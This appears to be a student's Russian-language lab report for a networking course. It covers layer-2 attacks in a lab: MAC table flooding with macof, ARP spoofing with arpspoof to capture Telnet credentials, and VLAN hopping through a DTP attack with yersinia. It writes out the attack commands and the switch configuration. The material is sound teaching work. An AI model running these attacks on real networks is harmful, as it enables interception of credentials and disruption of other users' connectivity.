# Катенин Владимир - Networks Basic. Занятие 2. Модель OSI. Канальный уровень - L2
[toc]
## Часть 1. Переполнение таблицы коммутации
1.1 Установим на kali linux необходимую утилиту
`apt update`
`apt install dsniff -y`


1.2 Включим атаку и через несколько секунд остановим её с помощью ctrl+c
`macof`

1.3 Увидим, что таблица коммутации switch7 переполнена

При этом другие устройства будут испытывать проблемы с сетью -- это можно проверить, запустив во время атаки обычный пинг.

## Часть 2. Arp-Spoofing
2.1 Установим на Win7 Telnet

2.2 Проверим, может ли win7 подключаться по telnet к switch7
`telnet 192.168.1.100`

2.3 Настроим kali для атаки. Изменим параметры маршрутизации
`nano /etc/sysctl.conf`
Нужно раскомментировать строку и сохранить файл

2.4 Применим изменения
`sysctl -p /etc/sysctl.conf`

2.5 Начнём атаку
`arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.100`,
где 50 -- адрес win7, 100 -- адрес switch7, eth0 -- сетевой интерфейс kali

2.6 Включим Wireshark на kali, после чего зайдем с win7 по telnet на switch7
Найдем Telnet трафик

2.7 Обнаружим в трафике аутентификационные данные пользователя

## Часть 3. VLAN hopping
3.1 Поместим Win10 в vlan10
`int e0/2`
`switchport mode access`
`switchport access vlan 10`
где е0/2 -- интерфейс, подключенный к win10

3.2 Сконфигурируем trunk port на switch7
`int e0/0`
`switchport trunk encapsulation dot1q`
`switchport mode trunk`
где е0/0 -- интерфейс, подключенный к switch9

3.3 Настроим на switch9 интерфейсы е0/0, e0/1, e0/2 в trunk

3.4 Настроим на роутере шлюз для vlan 10
`int e0/1.10`
`encapsulation dot1q 10`
`ip address 192.168.10.1 255.255.255.0`

**После этих настроек Kali и Win10 будут доступны по сети, но трафик между ними будет проходить через маршрутизацию роутером. Используем атаку VLAN hopping, чтобы получить доступ в рамках широковещательного домена из Kali до win10.**

3.5 Установим yersinia
`apt install yersinia -y`

3.6 Запустим yersinia
`yersinia -G`

3.7 Проведем атаку на протокол DTP

3.8 Подготовим интерфейсы Kali
`modprobe 8021q`
`vconfig add eth0 10`
`ifconfig eth0.10 up`
где 10 -- vlan id

3.9 Выдаем ip адрес на интерфейс eth0.10 из сети win10 и пробуем сгенерировать трафик к win10. С помощью Wireshark анализируем исходящий трафик от Kali22 и находим трафик с vlan ID 10.
